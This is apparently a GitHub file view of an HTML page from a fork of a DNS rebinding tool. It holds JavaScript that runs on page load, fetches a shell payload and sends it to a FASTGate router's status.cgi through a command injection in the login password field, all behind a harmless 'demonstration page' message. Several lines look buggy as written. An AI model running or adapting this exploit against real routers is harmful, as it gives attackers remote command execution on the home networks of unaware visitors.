forked from taviso/rbndr
-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.html
101 lines (101 loc) · 2.43 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<html>
<head>
<title>FASTGate targeted remote exploitation service</title>
<script>
var ajax, exploit, isthisyou, mp, random_string, token;
ajax = function(url, params, hdrs) {
var qs, req;
try {
req = new XMLHttpRequest;
qs = new URLSearchParams;
if (params) {
for (const [key, val] of Object.entries(params)) {
qs.append(key, val);
}
url += "?" + (qs.toString());
}
req.open('GET', url, 0);
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
if (hdrs) {
for (const [key, val] of Object.entries(hdrs)) {
req.setRequestHeader(key, val);
}
}
req.send();
if (req.status === 200) {
return req.responseText;
} else {
return null;
}
} catch (error) {
return null;
}
};
random_string = function(len) {
var ascii_letters, digits, i, j, letters, ref, result;
ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
digits = '0123456789';
letters = ascii_letters + digits;
result = '';
for (i = j = 0, ref = len; 0 <= ref ? j < ref : j > ref; i = 0 <= ref ? ++j : --j) {
result += letters.charAt(Math.random() * letters.length);
}
return result;
};
exploit = function(cmd, token) {
var hdrs, params;
params = {
'_': (Math.round((new Date).getTime() / 1000)) + "pytester" + (random_string(12)),
'sessionKey': 'NULL',
'cmd': '3',
'nvget': 'login_confirm',
'username': random_string(4),
'password': "'; " + cmd + " ; #"
};
hdrs = {
'X-XSRF-TOKEN': token,
'DNT': '1',
'Cookie': document.cookie
};
return ajax('/status.cgi', params, hdrs);
};
isthisyou = function() {
return ajax('/status.cgi', {
'_': (Math.round(Date.getTime / 1000)) + "pytester" + (random_string(12))
});
};
this.Payload = (function() {
var get, hasnot, set;
function Payload() {}
set = function() {
if (!isthisyou()) {
this.code = ajax('/payload.shell');
}
};
hasnot = function() {
return this.code == null;
};
get = function() {
return this.code;
};
return Payload;
})();
mp = new Payload;
while (mp.hasnot()) {
mp.set();
}
token = Math.round(Math.random * 100000000000);
document.cookie = "XSRF-TOKEN=" + token;
while (true) {
if (isthisyou()) {
exploit(mp.get(), token);
break;
}
}
</script>
</head>
<body>
<p>Hello visitor, this is a demonstration page.</p>
</body>
</html>